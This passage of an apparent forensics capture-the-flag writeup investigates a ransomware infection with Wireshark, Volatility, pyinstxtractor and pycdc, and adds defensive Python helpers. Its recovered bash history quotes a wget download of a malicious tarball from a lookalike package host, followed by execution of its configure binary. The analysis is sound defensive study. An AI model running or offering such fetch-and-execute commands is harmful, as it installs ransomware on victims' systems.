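def preview_partial(b64: str) -> str:
    """Decode a truncated blob as far as it cleanly goes:
    whole base64 quads only, then whole UTF-16 code units only."""
    raw = base64.b64decode(b64[: len(b64) // 4 * 4])
    return raw[: len(raw) // 2 * 2].decode("utf-16-le")


def build_chunks(script: str, width: int = 30) -> list[str]:
    """The macro author's step in reverse: script -> UTF-16LE -> base64 ->
    decimal codes, split into chunks of `width` numbers like the lines
    in okbzichkqtto()."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    nums = [str(ord(ch)) for ch in b64]
    return [" ".join(nums[i:i + width]) for i in range(0, len(nums), width)]


# Constructed sample: a stand-in for the real payload, which is not reproduced here.
SAMPLE_SCRIPT = "Write-Output 'HTB{constructed_sample_flag}'"
SAMPLE_CHUNKS = build_chunks(SAMPLE_SCRIPT)

# The first chunk from the listing above (real data from the writeup). It is
# only the start of the blob, so it can be previewed but not fully decoded.
FIRST_CHUNK_FROM_WRITEUP = (
    "74 65 66 122 65 68 48 65 74 119 65 51 65 68 99 65 76 103 "
    "65 51 65 68 81 65 76 103"
)

if __name__ == "__main__":
    print(recover_script(SAMPLE_CHUNKS))
    print(preview_partial(vba_chr_join(FIRST_CHUNK_FROM_WRITEUP)))
```

`preview_partial` is the piece you want while you are still pasting chunks in one at a time: base64 only decodes in groups of four characters and UTF-16LE only in pairs of bytes, so trimming to those boundaries lets you see `$s='...` from the very first line without a padding or decoding error.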

Poof

This is a typical memory forensics challenge with a few twists of its own. Most people use Volatility to analyse a memory dump (`.dmp`) file; I do the same and, honestly, I don't know any better tool. Download the challenge files from here and Volatility 2 from here.

The first question the challenge asks is: `what was the malicious URL that the ransomware was downloaded from?` To answer that, I don't think we need Volatility at all: we are also given a PCAP file. Open it in Wireshark and filter for HTTP traffic (display filter `http`).

We see two HTTP packets, the first one containing the URL.
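If you would rather have that answer reproducibly than by clicking through Wireshark, here is an added example (my code, not the writeup's) that walks a libpcap file by hand and returns the URL of every HTTP request in it. The capture it parses is constructed inline for the example (one request, one response, one non-HTTP segment) and is not the challenge pcap; the parser handles classic pcap with Ethernet/IPv4/TCP frames only, not pcapng, IPv6 or reassembled streams.

```python
import struct

# Added example (not the writeup's code): answer "where was it downloaded from?"
# by walking a classic libpcap file by hand. Ethernet/IPv4/TCP only; it looks
# for an HTTP request line plus a Host header in each TCP segment.

LINKTYPE_ETHERNET = 1


def iter_pcap_frames(data: bytes):
    """Yield each captured frame from a classic libpcap byte string."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":      # little-endian, microsecond timestamps
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":    # big-endian
        endian = ">"
    else:
        raise ValueError("not a classic libpcap file (pcapng is not handled here)")
    linktype = struct.unpack_from(endian + "IHHiIII", data, 0)[6]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24                              # global header is 24 bytes
    while off + 16 <= len(data):          # each record header is 16 bytes
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def tcp_payload(frame: bytes):
    """Strip Ethernet/IPv4/TCP headers; return None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack_from("!H", ip, 2)[0]
    if ip[9] != 6:                                       # protocol 6 = TCP
        return None
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    data_off = (tcp[12] >> 4) * 4
    return tcp[data_off:]


def http_request_urls(pcap: bytes) -> list[str]:
    """Return 'http://host/path' for every HTTP request line in the capture."""
    urls = []
    for frame in iter_pcap_frames(pcap):
        payload = tcp_payload(frame)
        if not payload:
            continue
        head = payload.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
        parts = head[0].split(b" ")
        # request line is "METHOD /path HTTP/1.x"; a response starts with "HTTP/1.x"
        if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
            continue
        host = b""
        for line in head[1:]:
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"host":
                host = value.strip()
        urls.append("http://" + host.decode("ascii", "replace")
                    + parts[1].decode("ascii", "replace"))
    return urls


# --- constructed sample capture (not the challenge pcap) ---------------------

def _frame(payload: bytes) -> bytes:
    """Wrap a TCP payload in minimal Ethernet/IPv4/TCP headers (checksums left zero)."""
    tcp = struct.pack("!HHIIBBHHH", 49152, 80, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes([10, 0, 0, 2]), bytes([192, 168, 0, 1])) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip


def _pcap(frames) -> bytes:
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out


SAMPLE_PCAP = _pcap([
    _frame(b"GET /files/payload.elf HTTP/1.1\r\nHost: example.invalid\r\n"
           b"User-Agent: curl/7.68.0\r\n\r\n"),
    _frame(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),   # response: no URL
    _frame(b"\x16\x03\x01\x00\x05hello"),                       # not HTTP at all
])

if __name__ == "__main__":
    for url in http_request_urls(SAMPLE_PCAP):
        print(url)
```

On a real capture, read the file with `open(path, "rb").read()` and pass it to `http_request_urls`; the response packet is deliberately ignored, since only the request line and Host header carry the URL the question is after.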

The second question is: `what is the name of the malicious process?`

For that we do need Volatility, with a profile that matches the kernel the dump was taken from. Copy the `ubuntu_profile` zip file to `volatility/volatility/plugins/overlays/linux/` and confirm the new profile is loaded with the `--info` flag:

10:13:01 root@kali poof → python2 ./volatility/vol.py --info | head
Volatility Foundation Volatility Framework 2.6.1


Profiles
--------
LinuxUbuntu_4_15_0-184-generic_profilex64 - A Profile for Linux Ubuntu_4.15.0-184-generic_profile x64
VistaSP0x64                               - A Profile for Windows Vista SP0 x64
VistaSP0x86                               - A Profile for Windows Vista SP0 x86
VistaSP1x64                               - A Profile for Windows Vista SP1 x64
VistaSP1x86                               - A Profile for Windows Vista SP1 x86
VistaSP2x64                               - A Profile for Windows Vista SP2 x64

Now we can see the plugins available for this profile using `--help`:

python2 ./volatility/vol.py --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 -f ./mem.dmp --help

Here we see the `linux_pstree` plugin, which outputs something like this:

10:17:32 root@kali poof → python2 ./volatility/vol.py --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 -f ./mem.dmp linux_pstree
Volatility Foundation Volatility Framework 2.6.1
Name                 Pid             Uid
systemd              1
.systemd-journal     429
.lvmetad             439
.systemd-udevd       453
.systemd-timesyn     636             62583
.systemd-network     734             100
.systemd-resolve     751             101
.accounts-daemon     820
.dbus-daemon         822             103
.networkd-dispat     839
.lxcfs               841
.rsyslogd            846             102
.systemd-logind      856
.atd                 857
.cron                864
.unattended-upgr     873
.polkitd             874
.agetty              890
.sshd                891
..sshd               1171
...sshd              1311            1000
....bash             1312            1000
.....configure       1340            1000
......configure      1341            1000
.systemd             1182            1000
..(sd-pam)           1184            1000
[kthreadd]           2
.[kworker/0:0]       3
.[kworker/0:0H]      4
.[kworker/u2:0]      5
.[mm_percpu_wq]      6
....

We can see that an SSH connection was established and that a bash process (pid 1312) is running under it as a child, with `configure` spawned from that shell. So we can check the bash history using the `linux_bash` plugin.

07:46:55 root@kali poof → python2 ./volatility/vol.py --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 -f ./mem.dmp linux_bash
Volatility Foundation Volatility Framework 2.6.1
Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
    1312 bash                 2022-10-20 09:10:22 UTC+0000   ls
    1312 bash                 2022-10-20 09:10:22 UTC+0000   pwd
    1312 bash                 2022-10-20 09:10:22 UTC+0000   sudo poweroff
    1312 bash                 2022-10-20 09:10:22 UTC+0000   history
    1312 bash                 2022-10-20 09:10:22 UTC+0000   ip a
    1312 bash                 2022-10-20 09:10:22 UTC+0000   sudo poweroff
    1312 bash                 2022-10-20 09:10:23 UTC+0000   ls
    1312 bash                 2022-10-20 09:10:25 UTC+0000   ls
    1312 bash                 2022-10-20 09:10:25 UTC+0000   cd Documents/
    1312 bash                 2022-10-20 09:10:27 UTC+0000   cd halloween_python_game/
    1312 bash                 2022-10-20 09:10:27 UTC+0000   ls
    1312 bash                 2022-10-20 09:10:36 UTC+0000   wget http://files.pypi-install.com/packages/a5/61/caf3af6d893b5cb8eae9a90a3054f370a92130863450e3299d742c7a65329d94/pygaming-dev-13.37.tar.gz
    1312 bash                 2022-10-20 09:10:47 UTC+0000   tar -xf pygaming-dev-13.37.tar.gz
    1312 bash                 2022-10-20 09:10:48 UTC+0000   ls
    1312 bash                 2022-10-20 09:10:51 UTC+0000   cd pygaming-dev-13.37/
    1312 bash                 2022-10-20 09:10:52 UTC+0000   ls
    1312 bash                 2022-10-20 09:10:57 UTC+0000   ./configure 

Now it is clear what ran on the server (./configure): the tarball gets downloaded, and after extracting it the user changes into the pygaming-dev-13.37 directory and runs configure.
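
As an added example (my own code, not part of the original writeup), here is a small Python triage helper that parses `linux_bash` rows and links a download to the later unpack and execution in the same shell. The sample rows are constructed from the history above with the long URL path shortened to a placeholder, and the rule that a tarball unpacks into a directory named after itself is an assumption.

```python
import re
from collections import namedtuple

Row = namedtuple("Row", "pid name time command")

# Constructed sample in the layout of volatility's linux_bash output; the commands mirror
# the history recovered above (the long wget URL path is shortened to a placeholder).
SAMPLE_LINUX_BASH = """\
Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
    1312 bash                 2022-10-20 09:10:22 UTC+0000   ls
    1312 bash                 2022-10-20 09:10:25 UTC+0000   cd Documents/
    1312 bash                 2022-10-20 09:10:27 UTC+0000   cd halloween_python_game/
    1312 bash                 2022-10-20 09:10:36 UTC+0000   wget http://files.pypi-install.com/packages/PLACEHOLDER/pygaming-dev-13.37.tar.gz
    1312 bash                 2022-10-20 09:10:47 UTC+0000   tar -xf pygaming-dev-13.37.tar.gz
    1312 bash                 2022-10-20 09:10:51 UTC+0000   cd pygaming-dev-13.37/
    1312 bash                 2022-10-20 09:10:57 UTC+0000   ./configure
"""

LINE_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\S+ \S+ \S+)\s+(.*)$")

def parse_linux_bash(text):
    """Turn linux_bash rows into Row tuples; header and separator lines do not match and are skipped."""
    return [Row(int(m[1]), m[2], m[3], m[4].strip())
            for m in (LINE_RE.match(line) for line in text.splitlines()) if m]

def find_download_exec_chains(rows):
    """Flag a fetch -> unpack -> execute sequence inside one shell (per pid); one dict per chain."""
    chains = []
    state = {}   # pid -> {"downloads": basename -> URL, "unpacked": dir -> archive, "cwd": str}
    for r in rows:
        s = state.setdefault(r.pid, {"downloads": {}, "unpacked": {}, "cwd": ""})
        if m := re.match(r"(?:wget|curl)\s+(\S+)", r.command):
            s["downloads"][m[1].rsplit("/", 1)[-1]] = m[1]
        elif (m := re.match(r"tar\s+-?\w*x\w*\s+(\S+)", r.command)) and m[1] in s["downloads"]:
            # assumption: the archive unpacks into a directory named like itself minus .tar[.gz]
            s["unpacked"][re.sub(r"\.tar(\.\w+)?$", "", m[1])] = m[1]
        elif m := re.match(r"cd\s+(\S+)", r.command):
            s["cwd"] = m[1].rstrip("/")            # only the last path component is tracked
        elif r.command.startswith("./") and s["cwd"] in s["unpacked"]:
            archive = s["unpacked"][s["cwd"]]
            chains.append({"pid": r.pid, "time": r.time, "url": s["downloads"][archive],
                           "archive": archive,
                           "executed": f"{s['cwd']}/{r.command.split()[0][2:]}"})
    return chains

if __name__ == "__main__":
    for chain in find_download_exec_chains(parse_linux_bash(SAMPLE_LINUX_BASH)):
        print(f"[!] pid {chain['pid']} fetched {chain['url']} and ran {chain['executed']} at {chain['time']}")
```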

Now the challenge wants us to provide the md5sum of the ransomware file, which means we need to dump the tar archive out of the PCAP. We can do that in Wireshark via File > Export Objects > HTTP.

Save it, extract the archive and pull out the configure file. To calculate the md5 of the file, use this command:

08:22:58 root@kali pygaming-dev-13.37 → md5sum ./configure 
7c2ff873ce6b022663a1f133383194cc  ./configure

The next question it asks: ‘which programming language is used to develop this‘.

I ran `strings` on configure, which shows some data related to `python`, and I assumed it to be a py2exe binary, which is correct. The answer was python.

Next, it asks us to decompile the Python ELF binary. For that we can use pyinstxtractor.

root@lucky:~/decompile-py2exe/pyinstxtractor# python3 pyinstxtractor.py  ../configure 
[+] Processing ../configure
[+] Pyinstaller version: 2.1+
[+] Python version: 3.6
[+] Length of package: 7448520 bytes
[+] Found 79 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: configure.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.6 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: ../configure
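
What pyinstxtractor does under the hood, as an added example (my own code, not the tool’s): PyInstaller appends a fixed-layout trailer (the "cookie") after the bundled archive, and reading it yields the package length, TOC offset and Python version printed above. The sample binary is constructed inline; the magic bytes and field layout are those of PyInstaller 2.1+, and the fake loader bytes are a stand-in for the real bootloader.

```python
import struct

# PyInstaller 2.1+ trailer ("cookie") layout: magic, package length, TOC offset,
# TOC length, Python version, name of the bundled Python shared library.
PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)   # 88 bytes

def parse_cookie(blob):
    """Find the last PyInstaller cookie in blob and return its fields, or None if there is none."""
    pos = blob.rfind(PYINST_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(blob):
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(COOKIE_FMT, blob[pos:pos + COOKIE_SIZE])
    # older PyInstaller stores major*10+minor (36), newer builds major*100+minor (306)
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)
    overlay = pos + COOKIE_SIZE - pkg_len          # package length counts data + TOC + cookie
    return {
        "python_version": f"{major}.{minor}",
        "package_length": pkg_len,
        "overlay_start": overlay,                  # where the archive begins inside the ELF
        "toc_start": overlay + toc_off,
        "toc_length": toc_len,
        "python_lib": pylib.rstrip(b"\x00").decode(),
    }

def build_sample(pyver=36):
    """Constructed stand-in for a PyInstaller-built ELF: fake loader bytes, archive data, TOC, cookie."""
    loader = b"\x7fELF" + b"\x00" * 60             # placeholder for the real bootloader
    data = b"fake compressed entry"                # stands in for the packed .pyc entries
    toc = b"fake toc"
    pkg_len = len(data) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, PYINST_MAGIC, pkg_len, len(data), len(toc), pyver,
                         b"libpython3.6m.so.1.0")
    return loader + data + toc + cookie

if __name__ == "__main__":
    # a mismatch between this interpreter and the version in the cookie is why the tool
    # above warns before unmarshalling the PYZ entries
    for key, value in parse_cookie(build_sample()).items():
        print(f"[+] {key}: {value}")
```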

The result lands in the `configure_extracted` directory, where there is a pyc file named `configure.pyc`. We need to recover the Python source from it; there is a tool for that, `pycdc`.

Installation steps:

apt install cmake -y
git clone https://github.com/zrax/pycdc
cd pycdc
mkdir build; cd build
cmake ..
make install

This will install `pycdc` on your system. Run the following command to get the source from configure.pyc.

10:26:01 root@kali pygaming-dev-13.37 → pycdc ./configure.pyc | head
# Source Generated with Decompyle++
# File: configure.pyc (Python 3.6)

from Crypto.Cipher import AES
import random
import string
import time
import os

def Pkrr1fe0qmDD9nKx(filename = None, data = None):
...

There is a function which calls the AES encryption routine; its name is the correct answer (mv18jiVh6TJI9lzY).
